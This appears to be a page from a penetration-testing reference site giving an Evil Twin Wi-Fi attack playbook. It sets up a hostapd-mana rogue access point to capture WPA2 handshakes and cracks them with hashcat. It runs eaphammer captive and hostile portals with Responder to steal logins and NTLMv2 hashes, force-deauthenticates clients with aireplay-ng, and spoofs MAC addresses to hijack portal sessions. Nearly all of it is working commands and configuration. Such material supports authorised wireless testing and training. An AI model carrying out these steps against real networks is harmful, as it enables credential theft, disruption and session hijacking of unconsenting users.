Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Evil Twin attacks involve creating a rogue AP that impersonates a legitimate network. Clients probing for a known network can be lured to connect to the fake AP, exposing their handshake, credentials, or session tokens.

Capture Handshake from Offline Network

If a network is not currently in range but clients are probing for it, hostapd-mana can impersonate the AP and capture the WPA2 handshake when a client connects. hostapd.conf: 
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=<TARGET-SSID>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
Launch the rogue AP: 
hostapd-mana hostapd.conf
Stop with CTRL+C when AP-STA-POSSIBLE-PSK-MISMATCH appears, the handshake is captured.

Crack Captured Handshake with Hashcat

Convert .hccapx to mode 22000 format: 
hcxhash2cap --hccapx=hostapd.hccapx -c aux.pcap
hcxpcapngtool aux.pcap -o hash.22000
hashcat -a 0 -m 22000 hash.22000 ~/rockyou.txt --force
Legacy mode (if 22000 is unavailable): 
hashcat -a 0 -m 2500 hostapd.hccapx ~/rockyou.txt --force

Captive Portal Attack (eaphammer)

Clients probing for open networks can be directed to a rogue AP with a captive portal that steals credentials via a fake login page. 
cd ~/tools/eaphammer
sudo killall dnsmasq
./eaphammer --essid <TARGET-OPEN-SSID> --interface wlan1 --captive-portal
Deauthenticate the target client in parallel to force reconnection: 
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>

Hostile Portal Attack (eaphammer + Responder)

Captures NTLMv2 hashes from Windows clients by serving a hostile portal that triggers automatic authentication. 
cd ~/tools/eaphammer
sudo killall dnsmasq
./eaphammer --essid <TARGET-SSID> --interface wlan1 --hostile-portal
Deauthenticate in parallel: 
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
Extract and crack the NTLMv2 hash: 
cat logs/Responder-Session.log | grep NTLMv2 | grep Hash | awk '{print $9}' > responder.5600
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force

MAC Spoofing to Bypass Captive Portal

If a captive portal requires authentication but a connected client already has an active session, spoofing their MAC bypasses the portal. Identify a connected client MAC via airodump-ng, then: 
systemctl stop network-manager
ip link set wlan1 down
macchanger -m <CLIENT-MAC> wlan1
ip link set wlan1 up
Reconnect with wpa_supplicant and request an IP: 
wpa_supplicant -Dnl80211 -i wlan1 -c open.conf
sudo dhclient -v wlan1